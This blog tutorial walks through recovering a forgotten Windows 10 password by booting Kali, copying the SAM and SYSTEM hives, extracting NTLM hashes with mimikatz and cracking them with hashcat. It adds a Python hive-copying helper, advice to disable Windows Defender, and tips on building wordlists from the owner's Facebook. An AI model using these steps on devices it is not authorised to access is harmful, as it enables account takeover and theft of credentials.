Retrieving lost Windows 10 password, using Kali Linux, mimikatz and hashcat

Recently, my girlfriend forgot her Windows 10 password, locking her out of her almost-brand-new laptop. I took it as a personal challenge to break into the Windows security layer and extract her password. Resetting the password was not an option!

With the Windows 10 Anniversary Update, cracking a Windows password got tougher, but after trying different approaches I managed to do it. Here is a guide showing the steps to follow.

TLDR; We'll be cracking a Windows 10 password without admin access, and this method works with the Windows 10 Anniversary Update!

Requirement: a password-locked computer, a not-password-locked computer, one (or two) USB keys.

Steps overview:

  1. Retrieve the files that hold the Windows 10 password database: the SAM and SYSTEM registry hives (the hashes live in SAM, encrypted with a key derived from SYSTEM, so both are needed)
  2. Extract the Windows 10 password hash from those files using mimikatz
  3. Crack the hash quickly using hashcat

Part I – Retrieving SAM and SYSTEM files from Windows

To extract those files without logging in to the computer, we'll boot the machine from an OS stored on a USB key. From there we can read the Windows file system directly: the hives are only locked by Windows while Windows itself is running.

Step 1 – Booting on a Live USB OS

You can download Kali Linux Light here: Kali Linux download page.

Flash the .iso on the USB using software like ISO to USB or Rufus.

Screenshot: Flashing the Kali ISO onto a USB key using Rufus.

Now you can boot from the USB key. To do so, turn off the computer you want to crack and plug in the USB key. Then start the computer and enter the BIOS setup by pressing the F11 or DELETE key (the key varies by vendor; F2, F10 and F12 are also common). Reorder the devices in Boot Priority, putting your USB key on top.

You will probably have to enable Legacy Support in your BIOS, which in turn usually requires disabling Secure Boot.

Screenshot: Enabling Legacy Support in the BIOS.

You can then Save and exit (F10), and proceed to booting on the OS.

Step 2 – Accessing Windows file system

Once the live OS is loaded, open a file manager. Your Windows partition might already be mounted, possibly read-only, which is enough since we only need to copy two files. If that's the case, you can jump directly to Step 3.

If the Windows partition is not mounted, do the following:

Find the correct device to mount.

$ fdisk -l
Device     Boot  Start    End   Sectors  Size  System
/dev/sdb1          269  10382  81232672  260M  EFI System
/dev/sdb2        10383  19452  72846742   16M  Microsoft reserved
/dev/sdb3        10383  11034   5229157  118G  Microsoft basic data
/dev/sda7        11035  19439  67505130  980M  Windows recovery environment

You can deduce which device is the main Windows partition by looking at the Size column: the EFI System, Microsoft reserved and recovery partitions are all small, so the 118G “Microsoft basic data” partition is the one we're looking for on a 128 GB SSD.
You might also have multiple physical disks, so it's up to you to choose the right one.

In this case, the device we want to mount is /dev/sdb3.

Then mount the partition into the Linux file system. Windows 10's Fast Startup leaves the volume in a hibernated state, which ntfs-3g refuses to mount read-write; the remove_hiberfile option discards the hibernation file so the mount succeeds (the saved Windows session is lost). If you'd rather not touch the volume, a read-only mount (-o ro instead of -o remove_hiberfile) is enough for copying the hives and leaves the hibernation state intact:

$ sudo mkdir /media/windows
$ sudo ntfs-3g -o remove_hiberfile /dev/sdb3 /media/windows

If the second command fails, you can run ntfsfix on the partition:

$ sudo ntfsfix /dev/sdb3
Mounting volume... Windows is hibernated, refused to mount.
Attempting to correct errors... 
Processing $MFT and $MFTMirr...
Reading $MFT... OK
Reading $MFTMirr... OK
Comparing $MFTMirr to $MFT... OK
Processing of $MFT and $MFTMirr completed successfully.
Setting required flags on partition... OK
Going to empty the journal ($LogFile)... OK
Windows is hibernated, refused to mount.
Remount failed: Operation not permitted

Even though ntfsfix reports “Remount failed”, we can still mount the Windows partition using:

$ sudo ntfs-3g -o remove_hiberfile /dev/sdb3 /media/windows
$ cd /media/windows
$ ls

Now, if you mounted the correct device, the ls command should display a list of familiar directories: “Windows”, “Program Files (x86)”, “Users”.

Step 3 – Dumping SAM and SYSTEM files

Now, assuming that we successfully mounted the Windows partition at /media/windows, copy the following two registry hives onto a USB key (they live in Windows/System32/config on the mounted partition):

/media/windows/Windows/System32/config/SAM
/media/windows/Windows/System32/config/SYSTEM

Those two files are needed to retrieve the hash of your Windows 10 password: SAM holds the local accounts and their hashes, SYSTEM holds the boot key that encrypts them.

You can now shut down the live OS; we're done with this part.
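As an added example (not part of the original post), here is a small Python helper you could run from the Kali live session to take the guesswork out of Part I: it picks the Windows data partition from an `fdisk -l` listing (the largest “Microsoft basic data” entry) and, when copying the hives, checks that each file really starts with the `regf` registry-hive signature, so you don't carry a wrong or truncated file over to Part II. The fdisk listing embedded below is constructed to mirror the one above; the mount point and USB destination paths in the usage comment are assumptions.

```python
import re
import shutil
from pathlib import Path
from typing import Dict, Optional

# Constructed `fdisk -l` listing mirroring the one above (not real disk data).
SAMPLE_FDISK = """\
Device     Boot  Start    End   Sectors  Size  Type
/dev/sdb1          269  10382  81232672  260M  EFI System
/dev/sdb2        10383  19452  72846742   16M  Microsoft reserved
/dev/sdb3        10383  11034   5229157  118G  Microsoft basic data
/dev/sdb4        11035  19439  67505130  980M  Windows recovery environment
"""

_UNITS = {"K": 1 << 10, "M": 1 << 20, "G": 1 << 30, "T": 1 << 40}
# device, optional '*' boot flag, start, end, sectors, size+unit, partition type
_PART = re.compile(r"^(/dev/\S+)\s+(?:\*\s+)?\d+\s+\d+\s+\d+\s+([\d.]+)([KMGT])\s+(.+?)\s*$")
HIVE_MAGIC = b"regf"  # signature at offset 0 of every Windows registry hive


def pick_windows_partition(fdisk_output: str) -> Optional[str]:
    """Device name of the largest 'Microsoft basic data' partition, or None."""
    best: Optional[tuple] = None
    for line in fdisk_output.splitlines():
        m = _PART.match(line.strip())
        if not m or m.group(4) != "Microsoft basic data":
            continue
        size = int(float(m.group(2)) * _UNITS[m.group(3)])
        if best is None or size > best[1]:
            best = (m.group(1), size)
    return best[0] if best else None


def is_registry_hive(path: Path) -> bool:
    """Cheap sanity check: a real hive starts with the 'regf' magic bytes."""
    try:
        with open(path, "rb") as fh:
            return fh.read(4) == HIVE_MAGIC
    except OSError:
        return False


def copy_hives(mount_point: Path, dest: Path) -> Dict[str, bool]:
    """Copy SAM and SYSTEM from <mount>/Windows/System32/config into dest.
    Only files that pass the hive check are copied; the result says which."""
    config = mount_point / "Windows" / "System32" / "config"
    dest.mkdir(parents=True, exist_ok=True)
    status: Dict[str, bool] = {}
    for name in ("SAM", "SYSTEM"):
        ok = is_registry_hive(config / name)
        if ok:
            shutil.copy2(config / name, dest / name)
        status[name] = ok
    return status


if __name__ == "__main__":
    print("Windows partition:", pick_windows_partition(SAMPLE_FDISK))  # /dev/sdb3
    # On the live system, after mounting (assumed paths):
    # print(copy_hives(Path("/media/windows"), Path("/media/usb/hives")))
```

If `copy_hives` reports False for either hive, you mounted the wrong partition or the file is not a hive; fix that before moving on, since mimikatz will just fail on a bad input.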

Part II – Getting the hash

This part will be much quicker, but this is where the Windows 10 Anniversary Update can cause trouble if you're not using the right software: since build 1607 the hashes stored in the SAM hive are encrypted with AES instead of the old RC4/DES scheme, so older dumpers such as samdump2 or pwdump return garbage. Recent mimikatz releases handle the new format.

First, disable Windows Defender Real-time Protection, otherwise it will quarantine mimikatz.exe as a hacking tool as soon as it is extracted (Windows start menu -> Search “Windows Defender” -> Windows Defender Security Center -> Virus & threat protection -> Virus & threat protection settings -> Turn off “Real-time Protection”). Remember to turn it back on when you're done.

Then, download and extract the latest mimikatz release: Mimikatz releases page.

Copy the SAM and SYSTEM files into mimikatz/x64.

Now open a terminal in the mimikatz/x64 directory (you can do that by typing “cmd” in the Windows Explorer address bar):

C:\Users\me\Downloads\mimikatz\x64> mimikatz.exe

  .#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03)
 .## ^ ##.
 ## / \ ##    /* * *
 ## \ / ##    Benjamin DELPY `gentilkiwi` ( )
 '## v ##'       (oe.eo)
  '#####'                                      with 13 modules * * */

mimikatz # lsadump::sam /system:SYSTEM_export /SAM:SAM_export

where SYSTEM_export and SAM_export are the SYSTEM and SAM files we copied in the previous step (use whatever names you gave them).

Even though we can't read the actual Windows 10 password from these files, the tool gives us its hash. It lists each local account with its RID, user name and a “Hash NTLM:” line. The NTLM hash is an unsalted MD4 of the UTF-16LE encoded password, which is why the next part goes so fast; the well-known value 31d6cfe0d16ae931b73c59d7e0c089c0 means the password is blank. Find the account you want to crack, save its 32 hex characters in a text file, and you're good to go to the next part.

Part III – Cracking the hash

Download hashcat: grab the binaries here.

Now we have to gather as much information as we can about the password we're about to crack: the more we know about its structure, the smaller the keyspace the cracking tool has to search, and the faster it finishes.

You should first ask the owner of the device what kind of Windows password they usually use, to get a rough idea of its structure. If the password is not completely random, you can combine a dictionary with a short brute-force mask instead of brute-forcing the whole thing; with hashcat this is called a hybrid attack (mode 6 is word followed by mask, mode 7 is mask followed by word).
For instance, in my case the forgotten password was probably a common name followed by a few random-ish letters/numbers (e.g. tomsdev54d). Assuming you stored the hash in phihash.txt and that you have a dictionary file phidict.log, here's the hashcat command to match this kind of password (-m 1000 selects NTLM; ?a stands for any printable ASCII character, so ?a?a?a appends exactly three of them to each word):

hashcat64.exe -m 1000 -a 6 phihash.txt phidict.log ?a?a?a

If the dictionary contains “tomsdev”, the password will be cracked in less than a minute and the result is written to hashcat.potfile (you can also re-run the command with --show to print it).

Session..........: hashcat
Status...........: Cracked
Hash.Type........: NTLM
Hash.Target......: phihash.txt
Time.Started.....: Tue Dec 05 17:00:33 2017 (5 secs)
Time.Estimated...: Tue Dec 05 17:00:38 2017 (0 secs)
Guess.Base.......: File (phidict.log), Left Side
Guess.Mod........: Mask (?a?a?a) [3], Right Side
Guess.Queue.Base.: 1/1 (100.00%)
Guess.Queue.Mod..: 1/1 (100.00%)
Speed.Dev.#1.....: 2674.4 MH/s (4.25ms)
Recovered........: 2/2 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 13245574144/22427215250 (59.06%)
Rejected.........: 0/13245574144 (0.00%)
Restore.Point....: 0/26158 (0.00%)
Candidates.#1....: 😋,bS -> logof1K
HWMon.Dev.#1.....: Temp: 52c Fan: 33% Util: 86% Core:1885MHz Mem:3802MHz Bus:16

Started: Tue Dec 05 17:00:31 2017
Stopped: Tue Dec 05 17:00:40 2017

Searching more efficiently

If we had to brute-force this 10-character password, it would probably have taken years rather than days: 95^10 is about 6×10^19 candidates, i.e. centuries at 2.7 GH/s. Instead, we search all combinations of “<dictionary word><3 random characters>”. With the 26,158-word dictionary above and ?a?a?a that is 26,158 × 95^3 ≈ 2.2×10^10 candidates, roughly the cost of brute-forcing a 5-character ?a password, which is why it finished in seconds. Note that ?a?a?a is exactly three characters; to also try one- and two-character suffixes, run with the shorter masks as well (hashcat's --increment option automates this). You can then tweak the pattern according to your needs (see the hashcat documentation for more information).
For instance, to match the reverse pattern, the mask goes first and the attack mode becomes 7 (mask then word):

<3 random characters><dictionary word>
hashcat64.exe -m 1000 -a 7 phihash.txt ?a?a?a phidict.log

Which dictionary should I use?

As I mentioned, this is completely up to the kind of password you want to crack. I recommend using at least a localized dictionary that matches the user's mother tongue.

But a better way is to build a custom dictionary from the user's own words: names, places, nicknames, etc. That's what I did using Facebook, and it worked wonders, saving me countless days of brainless brute-forcing and wasted GPU cycles.


I hope this guide helped you retrieve your lost Windows password and that you had fun acting hacker-ish while doing it. Feel free to ask any questions in the comments.


Retrieving lost Windows 10 password, using Kali Linux, mimikatz and hashcat was last modified: December 5th, 2017 by Tom Guillermin

8 thoughts on Retrieving lost Windows 10 password, using Kali Linux, mimikatz and hashcat

    • Well in that case, part of the challenge was to actually find what the password was! But it surely is simpler via a password reset, if your goal is only to log on to whatever account. And I guess Microsoft will eventually fix this exe swapping exploit before changing the way they store passwords 😉
      But thanks for sharing this alternative!

  1. hmm most of these comments are talking about resetting the password…
    but the tutorial is talking about finding the forgotten password ..
    for an easy and fast solution .. resetting the password is the best way.
    some people do this tutorial for some reason :3 .. i will choose to get the old password xD

    • Thank you Wofly. I rarely post comments but this is a great blog post and all the comments seem to completely miss the point of it.

      Yes, access to windows is faster and easier through reset, but if your goal is to gain knowledge of the password, this is the way to go.

      Thanks and kudos to Tom for writing this! 🙂

  2. Thanks for this info Tom!
    Resetting the password is not the hard part. I can surely see this option for my forensic job as part of logging in to other devices that we have seized.
